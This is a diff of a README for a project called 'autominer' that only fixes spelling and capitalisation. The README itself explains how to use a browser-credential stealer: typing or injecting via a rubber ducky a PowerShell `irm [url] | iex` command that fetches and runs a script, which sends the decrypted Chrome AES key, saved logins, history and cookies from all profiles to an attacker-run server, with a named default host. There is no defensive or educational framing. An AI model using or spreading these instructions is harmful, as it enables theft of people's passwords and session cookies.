zlc1004/autominer/README.md

 # autominer
-this is one of my projects that i worked on when i have time.
+this is one of the projects that I worked on when I had time.

-activate `irx [url to get script] | iex` on target with a rubber duckey, or by typing into a powershell window..
+activate `irm [url to get script] | iex` on target with a rubber ducky, or by typing into a PowerShell window.

-`get` is a powershell script.
+`get` is a PowerShell script.

-run `upload.py` as server to get data from target.
+run `upload.py` as a server to get data from the target.

-also change url in `get` to your server instead of `lucasz228.us.to`
+also, change url in `get` to your server instead of `lucasz228.us.to`

 `get` sends
-- decrypted chrome aes key
+- decrypted chrome AES key
 - chrome login data from all profiles
 - chrome history from all profiles
 - chrome cookies from all profiles